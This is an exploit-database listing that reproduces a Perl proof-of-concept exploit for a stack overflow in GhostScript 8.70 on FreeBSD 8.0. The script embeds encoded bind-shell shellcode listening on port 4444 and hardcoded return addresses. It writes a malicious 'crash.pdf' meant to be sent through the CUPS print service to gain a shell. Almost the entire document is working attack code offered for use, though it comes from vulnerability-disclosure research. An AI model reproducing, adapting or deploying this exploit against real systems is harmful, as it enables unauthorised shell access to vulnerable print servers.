GhostScript PostScript File Stack Overflow Exploit

2010-07-18T00:00:00
ID 1337DAY-ID-13394
Type zdt
Reporter n/a
Modified 2010-07-18T00:00:00

Description

Exploit for bsd platform in category local exploits

                                        
                                            ==================================================
GhostScript PostScript File Stack Overflow Exploit
==================================================


##########################################################################
# Check Point Software Technologies - Vulnerability Discovery Team (VDT) #
# Rodrigo Rubira Branco - <rbranco *noSPAM* checkpoint.com>        #
#                                    #
# GhostScript Stack Overflow                         #
#                                    # 
##########################################################################
 
# bsd/x86/shell_bind_tcp - 214 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, LPORT=4444, RHOST=,
# PrependSetreuid=false
my $buf =
"\x54\x5a\xda\xd1\xd9\x72\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43" .
"\x43\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58" .
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30" .
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x50\x31\x49\x50" .
"\x46\x30\x45\x38\x4b\x4f\x44\x42\x42\x31\x51\x4c\x4d\x59" .
"\x4b\x57\x50\x50\x43\x5a\x45\x51\x42\x4a\x44\x42\x42\x4a" .
"\x44\x50\x4e\x50\x45\x31\x48\x4d\x4b\x30\x51\x47\x46\x30" .
"\x46\x30\x43\x5a\x45\x38\x51\x48\x48\x4d\x4b\x30\x4d\x59" .
"\x51\x57\x4a\x4c\x48\x30\x43\x5a\x48\x4d\x4d\x50\x4e\x50" .
"\x45\x4e\x48\x4d\x4d\x50\x50\x50\x50\x50\x43\x5a\x51\x4a" .
"\x50\x58\x48\x4d\x4d\x50\x4b\x4f\x50\x4f\x4a\x44\x43\x49" .
"\x4b\x46\x46\x30\x42\x48\x46\x4f\x46\x4f\x44\x33\x42\x48" .
"\x43\x58\x46\x4f\x43\x52\x45\x39\x42\x4e\x4b\x39\x4b\x53" .
"\x46\x30\x46\x34\x50\x53\x50\x50\x48\x30\x47\x4b\x48\x4d" .
"\x4d\x50\x41\x41";
 
$pkt = "e!PS".
"A" x 500 . "00001111222233334444555556666777788889999aaa".
"\x40\xd9\xbf\xbf". #Shellcode Addr
"bccccddd".
"\xef\xbe\xbf\xbf".
"ffff".
"\xff\xbf" x 100 .
"C" x (1200 - length($buf)) . $buf . "Z" x 100;
 
print STDERR "Check Point Vulnerability Discovery Team (VDT)\n";
print STDERR "GhostScript 8.70 exploit for FreeBSD 8.0!\n";
print STDERR "Rodrigo Rubira Branco (BSDaemon)\n";
 
print STDERR "\nCreating evil pdf ...";
 
open(F,">crash.pdf");
 
print F $pkt;
 
close(F);
 
print STDERR " d0ne!\n";
print "Now print it via cupsd!\n";



#  0day.today [2018-01-05]  #